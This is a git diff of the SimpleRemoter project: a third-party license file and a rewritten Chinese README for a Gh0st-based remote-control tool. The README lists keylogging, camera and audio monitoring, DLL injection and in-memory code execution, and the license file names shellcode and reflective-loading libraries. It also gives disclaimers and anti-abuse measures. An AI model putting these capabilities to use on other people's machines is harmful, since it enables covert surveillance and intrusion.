IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE, OR IN CONNECTION WITH THE USE OR
OTHER DEALINGS IN THE SOFTWARE.

279
LICENSE-THIRD-PARTY.txt Normal file
View File

@@ -0,0 +1,279 @@
THIRD-PARTY SOFTWARE NOTICES AND LICENSES
This document contains intellectual property notices and license information for
third-party software components used in this product.
================================================================================
SUMMARY OF LICENSE TYPES
================================================================================
The third-party components included in this software are governed by the following
open-source licenses. For complete compliance, ensure that any modifications to
LGPL and MPL covered components are made available under their respective terms,
and this text file is distributed with your software product.
1. Zlib License
- zlib v1.3.2
2. BSD 3-Clause License
- zstd v1.5.7
- libyuv v190
- jpeg (libjpeg-turbo) v3.1.1
- opus-1.6.1
3. BSD 2-Clause License
- libpeconv c7d1e48
- pe_to_shellcode
4. MIT License
- jsoncpp v1.9.6
- sRDI
5. GNU Lesser General Public License v2.1 (LGPL v2.1)
- ffmpeg v7.1 (Compiled in shared, non-GPL mode)
6. Mozilla Public License v2.0 (MPL 2.0)
- MemoryModule
================================================================================
1. zlib v1.3.2 (Zlib License)
================================================================================
Copyright (C) 1995-2024 Jean-loup Gailly and Mark Adler
This software is provided 'as-is', without any express or implied
warranty. In no event will the authors be held liable for any damages
arising from the use of this software.
Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:
1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be
appreciated but is not required.
2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original software.
3. This notice may not be removed or altered from any source distribution.
================================================================================
2. zstd v1.5.7 (BSD 3-Clause License)
================================================================================
Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name Facebook nor the names of its contributors may be used to
endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================================================
3. libyuv v190 (BSD 3-Clause License)
================================================================================
Copyright 2011 The LibYuv Project Authors. All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Google nor the names of its contributors may be used to
endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================================================
4. jpeg (libjpeg-turbo) v3.1.1 (BSD 3-Clause / IJG License)
================================================================================
Copyright (C) 2009-2024 D. R. Commander. All Rights Reserved.
Copyright (C) 2015 Viktor Szathmáry. All Rights Reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the libjpeg-turbo Project nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================================================
5. opus-1.6.1 (BSD 3-Clause License)
================================================================================
Copyright 2001-2011 Xiph.Org, Skype Limited, Octasic,
Jean-Marc Valin, Timothy B. Terriberry,
CSIRO, Gregory Maxwell, Mark Borgerding,
Erik de Castro Lopo
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of the Xiph.Org Foundation nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION
OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================================================
6. libpeconv c7d1e48 & pe_to_shellcode (BSD 2-Clause License)
================================================================================
Copyright (c) 2020, hasherezade
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================================================
7. jsoncpp v1.9.6 (MIT License)
================================================================================
Copyright (c) 2007-2010 The JsonCpp Authors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
================================================================================
8. sRDI (MIT License)
================================================================================
Copyright (c) 2017 Drewsif
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================================================
9. ffmpeg v7.1 (GNU Lesser General Public License v2.1)
================================================================================
This software uses libraries from the FFmpeg project (v7.1), licensed under the
GNU Lesser General Public License (LGPL) version 2.1.
FFmpeg is a trademark of Fabrice Bellard, originator of the FFmpeg project.
Our product links to FFmpeg dynamically as a shared library (.dll/.so/.dylib)
and does NOT enable any GPL-licensed plugins (such as x264).
The source code of FFmpeg v7.1 can be obtained from the official FFmpeg
website (https://ffmpeg.org). If you require the exact build script and build
configuration used by our product to build the FFmpeg binary, please contact
our open-source compliance team.
================================================================================
10. MemoryModule (Mozilla Public License v2.0)
================================================================================
This Source Code Form is subject to the terms of the Mozilla Public License, v. 2.0.
If a copy of the MPL was not distributed with this file, You can obtain one at
http://mozilla.org/MPL/2.0/.
MemoryModule is Copyright (c) Joachim Bauch.
Under the terms of the MPL 2.0, you may distribute this component as part of
your commercial/proprietary application without being required to open-source
your own proprietary code, provided that:
1. MemoryModule source files remain unmodified, or if modified, those modifications
are made available under the MPL 2.0.
2. Users are informed that MemoryModule is used and where they can find its source.

792
ReadMe.md
View File

@@ -9,18 +9,18 @@
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/network/members"> <a href="https://github.com/yuanyuanxiang/SimpleRemoter/network/members">
<img src="https://img.shields.io/github/forks/yuanyuanxiang/SimpleRemoter?style=flat-square&logo=github" alt="GitHub Forks"> <img src="https://img.shields.io/github/forks/yuanyuanxiang/SimpleRemoter?style=flat-square&logo=github" alt="GitHub Forks">
</a> </a>
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/releases"> <a href="https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases">
<img src="https://img.shields.io/github/v/release/yuanyuanxiang/SimpleRemoter?style=flat-square" alt="GitHub Release"> <img src="https://img.shields.io/gitea/v/release/yuanyuanxiang/SimpleRemoter?gitea_url=https%3A%2F%2Fgit.simpleremoter.com&style=flat-square&logo=gitea" alt="Gitea Release">
</a> </a>
<img src="https://img.shields.io/badge/platform-Windows%20%7C%20Linux%20%7C%20macOS-blue?style=flat-square" alt="Platform"> <img src="https://img.shields.io/badge/client-Windows%20%7C%20Linux%20%7C%20macOS-blue?style=flat-square" alt="Client Platforms">
<img src="https://img.shields.io/badge/language-C%2B%2B17-orange?style=flat-square&logo=cplusplus" alt="Language"> <img src="https://img.shields.io/badge/server-Windows%20%7C%20Linux%20%7C%20macOS-success?style=flat-square" alt="Server Platforms">
<img src="https://img.shields.io/badge/IDE-VS2019%2B-purple?style=flat-square&logo=visualstudio" alt="IDE"> <img src="https://img.shields.io/badge/language-C%2B%2B17%20%2F%20Go-orange?style=flat-square&logo=cplusplus" alt="Language">
<img src="https://img.shields.io/badge/license-MIT-green?style=flat-square" alt="License"> <img src="https://img.shields.io/badge/license-MIT-green?style=flat-square" alt="License">
</p> </p>
<p align="center"> <p align="center">
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/releases/latest"> <a href="https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases/latest">
<img src="https://img.shields.io/badge/Download-最新版本-2ea44f?style=for-the-badge&logo=github" alt="Download Latest"> <img src="https://img.shields.io/badge/Download-最新版本-2ea44f?style=for-the-badge&logo=gitea" alt="Download Latest">
</a> </a>
</p> </p>
@@ -29,10 +29,7 @@
> [!WARNING] > [!WARNING]
> **重要法律声明** > **重要法律声明**
> >
> 本软件**仅供教育目的及授权使用场景**,包括 > 本软件**仅供教育目的及授权使用场景**组织内远程 IT 管理、经授权的渗透测试与安全研究、个人设备管理与技术学习。
> - 在您的组织内进行远程 IT 管理
> - 经授权的渗透测试和安全研究
> - 个人设备管理和技术学习
> >
> **未经授权访问计算机系统属违法行为。** 使用者须对遵守所有适用法律承担全部责任。开发者对任何滥用行为概不负责。 > **未经授权访问计算机系统属违法行为。** 使用者须对遵守所有适用法律承担全部责任。开发者对任何滥用行为概不负责。
@@ -41,13 +38,13 @@
## 目录 ## 目录
- [项目简介](#项目简介) - [项目简介](#项目简介)
- [免责声明](#免责声明) - [本版本亮点:全平台闭环](#本版本亮点全平台闭环)
- [合规与反滥用](#合规与反滥用)
- [功能特性](#功能特性) - [功能特性](#功能特性)
- [技术亮点](#技术亮点) - [全平台支持](#全平台支持)
- [系统架构](#系统架构) - [系统架构](#系统架构)
- [快速开始](#快速开始) - [快速开始](#快速开始)
- [用户文档](#用户文档) - [用户文档](#用户文档)
- [客户端支持](#客户端支持)
- [更新日志](#更新日志) - [更新日志](#更新日志)
- [相关项目](#相关项目) - [相关项目](#相关项目)
- [联系方式](#联系方式) - [联系方式](#联系方式)
@@ -56,25 +53,9 @@
## 项目简介 ## 项目简介
**SimpleRemoter** 是一个功能完整的远程控制解决方案,基于经典的 Gh0st 框架重构,采用现代 C++17 开发。项目始于 2019 年,经过持续迭代已发展为支持 **Windows + Linux + macOS** 三平台的企业级远程管理工具 **SimpleRemoter** 是一个端到端跨平台的远程控制解决方案。
### 核心能力 项目核心基于经典 **Gh0st 架构**,最早始于 2019 年 1 月。历经 7 年持续迭代——从 IOCP 通信内核重构、x264 视频级编码、V2 文件传输协议、多层授权体系,到 Linux 与 macOS 客户端的引入——本版本最终完成**客户端 + 服务端的全平台闭环**三大桌面操作系统Windows / Linux / macOS在任一侧都可作为受控端或主控端。
| 类别 | 功能 |
|------|------|
| **远程桌面** | 实时屏幕控制、多显示器支持、H.264 编码、自适应质量 |
| **文件管理** | 双向传输、断点续传、C2C 传输、SHA-256 校验 |
| **终端管理** | 交互式 Shell、ConPTY/PTY 支持、现代 Web 终端 |
| **系统管理** | 进程/服务/窗口管理、注册表浏览、会话控制 |
| **媒体采集** | 摄像头监控、音频监听、键盘记录 |
| **网络功能** | SOCKS 代理、FRP 穿透、端口映射 |
### 适用场景
- **企业 IT 运维**:批量管理内网设备,远程故障排查
- **远程办公**:安全访问办公电脑,文件同步传输
- **安全研究**:渗透测试、红队演练、安全审计
- **技术学习**网络编程、IOCP 模型、加密传输实践
**原始来源:** [zibility/Remote](https://github.com/zibility/Remote) | **起始日期:** 2019.1.1 **原始来源:** [zibility/Remote](https://github.com/zibility/Remote) | **起始日期:** 2019.1.1
@@ -82,36 +63,73 @@
--- ---
## 免责声明 ## 本版本亮点:全平台闭环
**请在使用本软件前仔细阅读以下声明:** 本项目长期以 **C++ MFC 主控**`YAMA.exe`)为核心交付形态——经典 Gh0st 架构、IOCP 高性能内核、完整的远程桌面 / 文件 / 进程 / 媒体功能栈、多层授权体系、品牌定制——**至今仍是主要使用的主控**。MFC 主控内置了基于 WebSocket 的 Web 远程桌面服务,从 v1.3.1 起就已经支持**任意平台的浏览器**远控被管设备(手机/平板/Linux/macOS 桌面均可)。
1. **合法用途**:本项目仅供合法的技术研究、学习交流和授权的远程管理使用。严禁将本软件用于未经授权访问他人计算机系统、窃取数据、监控他人隐私等任何违法行为 本版本v1.3.4)补上了最后一块拼图——**Go 主控**:一个**功能简单、聚焦于"远程桌面 + 远程终端 + 多用户分级"** 的轻量服务端,跨 Windows / Linux / macOS 编译运行。它的定位**不是替代 MFC**,而是为那些**不便于跑 Windows VPS** 的用户提供一个原生的 Linux/macOS 主控落点——例如纯 Linux 服务器、ARM Mac 长驻、嵌入式主控箱等场景
2. **使用者责任**:使用者必须遵守所在国家/地区的法律法规。因使用本软件而产生的任何法律责任,由使用者自行承担。 ### 两种主控形态如何选择
3. **无担保声明**:本软件按"现状"提供,不附带任何明示或暗示的担保,包括但不限于适销性、特定用途适用性的担保。 | 形态 | GUI | 功能覆盖 | 平台 | 定位 |
|---|---|---|---|---|
| **C++ MFC 主控** (`YAMA.exe`) | 原生 Windows GUI + 内置 Web 服务 | ✅ **全部功能** | Windows | **主推方案**。日常运维、文件管理、媒体采集、多层授权、品牌定制等都用它 |
| **Go 主控**(新) | Web UI任何浏览器 | 远程桌面 + 远程终端 + 多用户 | Windows / Linux / macOS | **补充方案**。需要"零 Windows 依赖"的纯 Linux/macOS 主控部署 |
4. **免责条款**:开发者不对因使用、误用或无法使用本软件而造成的任何直接、间接、偶然、特殊或后果性损害承担责任。 > [!TIP]
> 两种主控**用的是同一套客户端**——可以混搭,例如一台 Windows MFC 主控 + 一台 Linux Go 主控并行管理同一批设备群。
5. **版权声明**:本项目采用 MIT 协议开源,允许自由使用、修改和分发,但必须保留原始版权声明。 ### Go 主控的核心能力v1.3.4 新增)
**继续使用本软件即表示您已阅读、理解并同意上述所有条款。** - **远程桌面**H.264 流通过 WebSocket 直发浏览器WebCodecs 硬解1080P @ 20fps 流畅
- **远程终端**xterm.js + ConPTY/PTY支持调整尺寸、Tab 补全
- **多用户体系**:管理员 / 普通用户分级、Challenge-Response 登录、不透明 token、按设备组授权
- **生产部署**Nginx 反代 + Let's Encrypt + Keyboard Lock + 全屏控制、防止 ESC / F11 误退出
- **故意保持轻量**:不包含文件管理、媒体采集、注册表、服务管理等 MFC 主控专属功能——这些请走 MFC 主控
### 全平台支持矩阵
| | **客户端 (受控端)** | **主控端** |
|---|---|---|
| **Windows** | ✅ 完整功能 | ✅ MFC `YAMA.exe`(推荐)/ Go |
| **Linux** (X11) | ✅ 屏幕 + 终端 + 文件 + 剪贴板 | ✅ Go |
| **macOS** (Intel + Apple Silicon) | ✅ 屏幕 + 终端 + 文件 + 剪贴板 | ✅ Go |
---
## 合规与反滥用
本项目长期坚持「明确的合规姿态」立场。本版本进一步收紧反滥用边界。
### 内置技术措施
源代码层面构筑多道独立可验证的反滥用屏障,详见 [反滥用技术措施清单](./docs/Compliance_TechnicalMeasures.md)
- **入站连接 IP 段校验**:试用版若被部署到公网会触发可见告警 latch
- **监听端口上限**:试用版限制 ≤ 2 个监听端口,防多租户中转改造
- **应用层 RTT 反代理**LAN 内 RTT 阈值检测,反向代理 / 隧道会被识别
- **多层授权架构**V2 ECDSA 离线 + V1 在线 + 试用版分级,每一层限制独立
- **Web 主控认证**:强制 Challenge-Response 登录、登录限流、不透明 token、操作可审计
### 合规文档
| 文档 | 内容 |
|---|---|
| 📖 [反滥用与合规使用政策](./docs/Compliance_AntiAbuse.md) | 完整的发行方-使用方责任划分 |
| 📖 [反滥用技术措施清单](./docs/Compliance_TechnicalMeasures.md) | 每一道屏障的源代码位置、设计动机、已知局限 |
> [!IMPORTANT] > [!IMPORTANT]
> **网络连接与隐私声明** > **使用本软件即视为您已阅读、理解并接受上述合规文档全部条款。** 如您不能或不愿接受任一条款,请立即停止使用并销毁本软件副本。
>
> 主控程序(服务端)会根据授权状态与授权服务器进行网络通信: ### 网络连接与隐私
>
> | 版本类型 | 连接行为 | | 版本类型 | 连接行为 |
> |---------|---------| |---|---|
> | 试用版本 | 维持与授权服务器的持续连接 | | 试用版本 | 维持与授权服务器的持续连接 |
> | V1/V2 授权版本 | 启动时连接验证,通过后断开 | | V1/V2 授权版本 | 启动时连接验证,通过后断开 |
> | V2 离线授权版本 | 无需连接授权服务器 | | V2 离线授权版本 | 无需连接授权服务器 |
>
> 除获得离线授权外,主控程序会与授权服务器进行必要的数据交互(如检测破解行为、验证授权有效性)。 除获得离线授权外,主控程序会与授权服务器进行必要的数据交互(如检测破解行为、验证授权有效性)。
>
> **使用本软件即表示您接受主控程序与授权服务器之间的数据传输。如您不同意,请勿使用本软件。**
--- ---
@@ -121,240 +139,149 @@
![远程桌面](./images/Remote.jpg) ![远程桌面](./images/Remote.jpg)
- **多种截图方式**GDI兼容性强、DXGI高性能、虚拟桌面后台运行 - **多种屏幕捕获**GDI / DXGI / 虚拟桌面Windows、X11 + XShmLinux、CGDisplayStreammacOS
- **智能压缩算法** - **智能压缩**DIFF 差分SSE2 优化)/ RGB565节省 50% 带宽)/ **H.264**视频级压缩x264 + VideoToolbox + WebCodecs/ 灰度模式
- DIFF 差分算法 - SSE2 优化,仅传输变化区域 - **自适应质量**:根据 RTT 自动调节帧率5-30 FPS、分辨率、压缩算法
- RGB565 算法 - 节省 50% 带宽 - **多显示器**:多屏切换 + 多屏上墙
- H.264 编码 - 视频级压缩,适合高帧率场景 - **跨设备文件拖拽**Ctrl+C/V 跨设备复制粘贴文件
- 灰度模式 - 极低带宽消耗 - **Web 远程桌面**:浏览器直接访问,手机/平板可用([配置指南](./docs/WebHTTPS.md)
- **自适应质量**:根据网络 RTT 自动调整帧率5-30 FPS、分辨率和压缩算法
- **多显示器**:支持多屏切换和多屏上墙显示 ![Web远程桌面](./images/WebRemote.png)
- **隐私屏幕**:被控端屏幕可隐藏,支持锁屏状态下控制
- **文件拖拽**Ctrl+C/V 跨设备复制粘贴文件
- **Web 远程桌面**:通过浏览器访问远程桌面,支持手机/平板([配置指南](./docs/WebHTTPS.md)
### 文件管理 ### 文件管理
![文件管理](./images/FileManage.jpg) ![文件管理](./images/FileManage.jpg)
- **V2 传输协议**全新设计,支持大文件(>4GB - **V2 传输协议**支持 >4GB 大文件、断点续传、SHA-256 校验
- **断点续传**:网络中断后自动恢复,状态持久化
- **C2C 传输**:客户端之间直接传输,无需经过主控 - **C2C 传输**:客户端之间直接传输,无需经过主控
- **完整性校验**SHA-256 哈希验证,确保文件完整 - **批量操作**:搜索、压缩、批量传输
- **批量操作**:支持文件搜索、压缩、批量传输
### 终端管理 ### 终端管理
![终端管理](./images/Console.jpg) ![终端管理](./images/LinuxClient.png)
- **交互式 Shell**完整的命令行体验,支持 Tab 补全 - **交互式 Shell**Tab 补全、ANSI 转义、调整尺寸
- **ConPTY 技术**Windows 10+ 原生伪终端支持 - **现代终端**Windows ConPTY、Linux/macOS PTY
- **现代 Web 终端**基于 WebView2 + xterm.jsv1.2.7+ - **Web 终端**xterm.js + WebSocket跟原生体验一致
- **终端尺寸调整**:自适应窗口大小
### 进程与窗口管理
| 进程管理 | 窗口管理 |
|---------|---------|
| ![进程](./images/Process.jpg) | ![窗口](./images/Window.jpg) |
- **进程管理**查看进程列表、CPU/内存占用、启动/终止进程
- **代码注入**:向目标进程注入 DLL需管理员权限
- **窗口控制**:最大化/最小化/隐藏/关闭窗口
### 媒体功能
| 视频管理 | 语音管理 |
|---------|---------|
| ![视频](./images/Video.jpg) | ![语音](./images/Voice.jpg) |
- **摄像头监控**:实时视频流,支持分辨率调整
- **音频监听**:远程声音采集,支持双向语音
- **键盘记录**:在线/离线记录模式
### 其他功能 ### 其他功能
- **服务管理**:查看和控制 Windows 服务 | 模块 | 能力 |
- **注册表浏览**:只读方式浏览注册表内容 |---|---|
- **会话控制**:远程注销/关机/重启 | **进程管理** | 进程列表、CPU/内存占用、终止、DLL 注入 |
- **SOCKS 代理**:通过客户端建立代理隧道 | **窗口管理** | 最大化/最小化/隐藏/关闭 |
- **FRP 穿透**:内置 FRP 支持,轻松穿透内网 | **媒体采集** | 摄像头、双向语音、键盘记录 |
- **代码执行**:远程执行 DLL支持热更新 | **系统控制** | 服务管理、注册表、会话注销/关机 |
| **网络功能** | SOCKS 代理、FRP 穿透、端口映射 |
| **代码执行** | 远程执行 DLL、内存加载、热更新 |
--- ---
## 技术亮点 ## 全平台支持
### 高性能网络架构 ### Windows 客户端
``` **系统要求**Windows 7 SP1 及以上
┌─────────────────────────────────────────────────────────┐ **功能完整性**:✅ 全部功能支持
│ IOCP 通信模型 │
├─────────────────────────────────────────────────────────┤
│ • I/O 完成端口Windows 最高效的异步 I/O 模型 │
│ • 单主控支持 10,000+ 并发连接 │
│ • 支持 TCP / UDP / KCP 三种传输协议 │
│ • 自动分块处理大数据包(最大 128KB 发送缓冲) │
└─────────────────────────────────────────────────────────┘
```
### 自适应质量控制 ### Linux 客户端v1.2.5+
基于 RTTRound-Trip Time的智能质量调整系统 **系统要求**
- 显示服务器X11/Xorg暂不支持 Wayland
- 必需库libX11推荐库libXtstXTest 扩展、libXss空闲检测
| RTT 延迟 | 质量等级 | 帧率 | 分辨率 | 压缩算法 | 适用场景 | | 功能 | 状态 | 实现 |
|---------|---------|------|--------|---------|---------| |---|---|---|
| < 30ms | Ultra | 25 FPS | 原始 | DIFF | 局域网办公 | | 远程桌面 | ✅ | X11 屏幕捕获 + libx264 H.264 硬件编码 |
| 30-80ms | High | 20 FPS | 原始 | RGB565 | 一般办公 | | 远程终端 | ✅ | PTY 交互式 Shell |
| 80-150ms | Good | 20 FPS | ≤1080p | H.264 | 跨网/视频 | | 文件管理 | ✅ | V2 协议、双向传输、大文件 |
| 150-250ms | Medium | 15 FPS | ≤900p | H.264 | 跨网办公 | | 进程管理 | ✅ | 列表 + 终止 |
| 250-400ms | Low | 12 FPS | ≤720p | H.264 | 较差网络 | | 剪贴板同步 | ✅ | xclip / xsel 外部工具,支持文件 URI |
| > 400ms | Minimal | 8 FPS | ≤540p | H.264 | 极差网络 | | 心跳/RTT | ✅ | RFC 6298 RTT 估算 |
| 守护进程 | ✅ | 双 fork 守护化 |
- **零额外开销**:复用心跳包计算 RTT **编译**`cd linux && cmake . && make`
- **快速降级**2 次检测即触发,响应网络波动
- **谨慎升级**5 次稳定后才提升质量
- **冷却机制**:防止频繁切换
### V2 文件传输协议 ### macOS 客户端v1.3.2+
```cpp **系统要求**
// 77 字节协议头 + 文件名 + 数据载荷 - macOS 10.15 (Catalina) 及以上
struct FileChunkPacketV2 { - 架构Intel (x64) 和 Apple Silicon (arm64) 通用二进制
uint8_t cmd; // COMMAND_SEND_FILE_V2 = 85 - 系统权限:屏幕录制、辅助功能、完全磁盘访问
uint64_t transferID; // 传输会话 ID
uint64_t srcClientID; // 源客户端 ID (0=主控端)
uint64_t dstClientID; // 目标客户端 ID (0=主控端, C2C)
uint32_t fileIndex; // 文件编号 (0-based)
uint32_t totalFiles; // 总文件数
uint64_t fileSize; // 文件大小(支持 >4GB
uint64_t offset; // 当前块偏移
uint64_t dataLength; // 本块数据长度
